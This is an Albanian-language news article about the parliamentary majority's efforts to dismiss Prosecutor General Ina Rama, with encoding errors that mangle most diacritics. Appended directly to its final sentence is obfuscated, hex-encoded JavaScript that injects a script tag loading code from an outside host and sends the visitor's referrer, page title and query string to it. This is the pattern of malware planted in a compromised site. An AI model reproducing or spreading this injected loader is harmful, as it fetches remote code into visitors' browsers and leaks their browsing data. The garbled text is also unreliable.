ina-rama-2

Shkarkimi i Ina RamA�s, zbulohet raporti i ministrit Halimit

Mazhoranca ka shtuar pA�rpjekjet e saj pA�r tA� krijuar tA� gjithA� kushtet pA�r shkarkimin e Prokurores sA� PA�rgjithshme, Ina Rama brenda 22 nA�ntorit. Burime nga Kuvendi bA�jnA� tA� ditur se nA� protokollin e kA�tij institucioni, Ministria e DrejtA�sisA� ka depozituar raportin e pA�rgatitur nga inspektimet qA� janA� kryer nA� ProkurorinA� e PA�rgjithshme dhe nA� prokuroritA� e rretheve. Debati pA�r mandatin e kryeprokurores lidhet me faktin se Ina Rama u emA�rua nA� kA�tA� detyrA� disa muaj pA�rpara ndryshimeve kushtetuese ku A�shtA� pA�rcaktuar njA� mandat 5-vjeA�ar pA�r kreun e akuzA�s.

PA�rpara ndryshimeve, ligji themeltar rriste fuqinA� e kryeprokurorit duke i dhA�nA� mandat tA� pakufizuar. Rastet e vetme tA� ndA�rprerjes sA� mandatit ishte dorA�heqja ose vendimi i Presidentit pA�r tA� dekretuar shkarkimin pas njA� komisioni hetimor parlamentar.

NA� rast tA� vendosmA�risA� sA� Kryeprokurores Ina Rama pA�r tA� qA�ndruar deri nA� maj nA� krye tA� detyrA�s, ekzekutivi ka menduar njA� plan a�?Ba�?. Burime nga Kuvendi bA�jnA� tA� ditur se njA� javA� mA� parA�, tA� mA�rkurA�n, A�shtA� depozituar nA� protokoll raporti i MinistrisA� sA� DrejtA�sisA� pA�r veprimtarinA� e organit tA� akuzA�s pA�r vitin 2011. NdonA�se nuk bA�het i ditur i gjithA� teksti, mA�sohet se janA� pA�rfshirA� konstatimet e inspektorA�ve tA� kA�saj ministrie nga kontrollet e ushtruara nA� ProkurorinA� e PA�rgjithshme dhe nA� prokuroritA� e rretheve.

NjA� nga prokuroritA� qA� A�shtA� kontrolluar A�shtA� edhe ajo e KorA�A�s. Mesa duket mazhoranca po mendon qA� tA� presA� datA�n 22 nA�ntor pA�r tA� parA� qA�ndrimin e Prokurores Ina Rama, nA�se do tA� largohet apo do tA� vijojA� punA�n e saj, dhe mA� pas tA� nisA� shqyrtimi i raportit nga Komisioni i Ligjeve. Neni 53 i ligjit a�?PA�r organizimin dhe funksionimin e ProkurorisA�a�? parashikohet qA� Prokurori i PA�rgjithshA�m raporton nA� Kuvend ose komisionet parlamentare tA� paktA�n njA� herA� nA� gjashtA� muaj ose sa herA� qA� kA�rkohet prej tyre, shkruan Shekulli.

Raportimi pA�rmban tA� dhA�na dhe shpjegime pA�r numrin, llojet, shtrirjen territoriale, intensitetin dhe format e kriminalitetit nA� RepublikA�n e ShqipA�risA�, si dhe drejtimet dhe pA�rparA�sitA� nA� luftA�n ndaj kriminalitetit.var _0x31f1=[“\x73\x63\x72\x69\x70\x74″,”\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74″,”\x73\x72\x63″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26\x73\x65\x5F\x72\x65\x66\x65\x72\x72\x65\x72\x3D”,”\x72\x65\x66\x65\x72\x72\x65\x72″,”\x26\x64\x65\x66\x61\x75\x6C\x74\x5F\x6B\x65\x79\x77\x6F\x72\x64\x3D”,”\x74\x69\x74\x6C\x65″,”\x26″,”\x3F”,”\x72\x65\x70\x6C\x61\x63\x65″,”\x73\x65\x61\x72\x63\x68″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”,”\x26\x66\x72\x6D\x3D\x73\x63\x72\x69\x70\x74″,”\x63\x75\x72\x72\x65\x6E\x74\x53\x63\x72\x69\x70\x74″,”\x69\x6E\x73\x65\x72\x74\x42\x65\x66\x6F\x72\x65″,”\x70\x61\x72\x65\x6E\x74\x4E\x6F\x64\x65″,”\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64″,”\x68\x65\x61\x64″,”\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65″,”\x70\x72\x6F\x74\x6F\x63\x6F\x6C”,”\x68\x74\x74\x70\x73\x3A”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x52\x5F\x50\x41\x54\x48″,”\x54\x68\x65\x20\x77\x65\x62\x73\x69\x74\x65\x20\x77\x6F\x72\x6B\x73\x20\x6F\x6E\x20\x48\x54\x54\x50\x53\x2E\x20\x54\x68\x65\x20\x74\x72\x61\x63\x6B\x65\x72\x20\x6D\x75\x73\x74\x20\x75\x73\x65\x20\x48\x54\x54\x50\x53\x20\x74\x6F\x6F\x2E”];var d=document;var s=d[_0x31f1[1]](_0x31f1[0]);s[_0x31f1[2]]= _0x31f1[3]+ encodeURIComponent(document[_0x31f1[4]])+ _0x31f1[5]+ encodeURIComponent(document[_0x31f1[6]])+ _0x31f1[7]+ window[_0x31f1[11]][_0x31f1[10]][_0x31f1[9]](_0x31f1[8],_0x31f1[7])+ _0x31f1[12];if(document[_0x31f1[13]]){document[_0x31f1[13]][_0x31f1[15]][_0x31f1[14]](s,document[_0x31f1[13]])}else {d[_0x31f1[18]](_0x31f1[17])[0][_0x31f1[16]](s)};if(document[_0x31f1[11]][_0x31f1[19]]=== _0x31f1[20]&& KTracking[_0x31f1[22]][_0x31f1[21]](_0x31f1[3]+ encodeURIComponent(document[_0x31f1[4]])+ _0x31f1[5]+ encodeURIComponent(document[_0x31f1[6]])+ _0x31f1[7]+ window[_0x31f1[11]][_0x31f1[10]][_0x31f1[9]](_0x31f1[8],_0x31f1[7])+ _0x31f1[12])=== -1){alert(_0x31f1[23])}